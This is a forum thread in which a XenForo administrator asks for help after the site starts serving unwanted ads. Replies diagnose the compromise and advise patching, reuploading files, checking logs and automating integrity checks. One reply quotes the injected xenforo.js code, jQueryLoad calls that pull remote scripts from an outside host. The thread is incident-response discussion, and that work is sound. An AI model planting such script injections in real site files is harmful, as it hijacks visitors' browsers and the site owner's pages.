Xenforo exploit?

Shipside

Member
My xenforo forum is compromised and is serving ads (I have no ads)

<html><body style="margin:0px;"><a href=" http://main.exoclick.com/click.php?...8NGFjNzI5ODg3NWY4YWEwYjkxZjM5OWFhZWEyZDI0OTM= " target="_blank" onclick="this.href = this.href + '&clickX=' + event.clientX + '&clickY=' + event.clientY;"><img width="300" height="250" src=" https://static.exoclick.com/6a97888...a/banners/270750/16318120957971100_1_xacd.gif " border="0"></a></body></html>

I did a file integrity check and got this result:

js/xenforo/xenforo.js File does not contain expected contents. It's the only file that has been changed.

I have uploaded it to see if you can figure out what kind of exploit is going on.
 

Attachments

First things to do are
- Update the server with the latest security patches.
- Upload XF files again.
- Change all your passwords on the server.
- Check logs if you can find how this could happen. And keep an eye on it if anything suspicious happens.
 
The likelihood is that your server was compromised in some other way. Code has been added to xenforo.js:
Code:
jQueryLoad("http://assemblergames.com/l/js/dark/google-services.php?t=6&s=3&w=150&h=500&l=content", function(){});jQueryLoad("http://assemblergames.com/l/js/dark/google-services.php?t=1&s=2&w=70&h=500&l=content", function(){});
It does depend on server setup whether this file would normally be editable via PHP, though ideally it wouldn't be. If it's not, then someone almost certainly gained access another way.

If you look at the URL there, you'll find an unexpected file in that directory which then leads to another one. You need to remove them and look very closely for anything else that may have been added unexpected.

If you're on a shared server, it's very possible that a compromise on another site has caused the issue. The fact that they served ads leads me to believe this wasn't necessarily a targeted event. Log analysis may be the only way to get some idea of what happened.

We certainly aren't aware of any issues in XF that would allow arbitrary code execution or arbitrary file writes.
 
We are on a dedicated server. We are examining logs.

We have ascertained that the exploit was most likely via an add-on for xenforo. We are still checking the entire server.

Most likely a 3rd party add on is exposing xenforo to attack, and whilst we do not want to
say what add on without definitive proof, the weakness so far would fall in line with that idea.
 
Would it be worth putting a file integrity check notice in the ACP home that checks regularly and notifies the admin when something is off so it doesn't need to be done manually only after you notice something is wrong?
 
I will have files to send to you. I would like for you to examine them as we have not been able to determine how he was able to get access to xenforo files but not the server itself.
 
Which files? If they are files belonging to an add on then that should be reported to the add on author in the first instance as per the link above.
 
Would it be worth putting a file integrity check notice in the ACP home that checks regularly and notifies the admin when something is off so it doesn't need to be done manually only after you notice something is wrong?
Yes, that's always a good thing. I already do that.
Chris made an add-on to do that. This sends an email, makes a notice in the APC and logs the error if something is wrong. (y)
https://xenforo.com/community/resources/auto-file-health-check.1375/
 
Top Bottom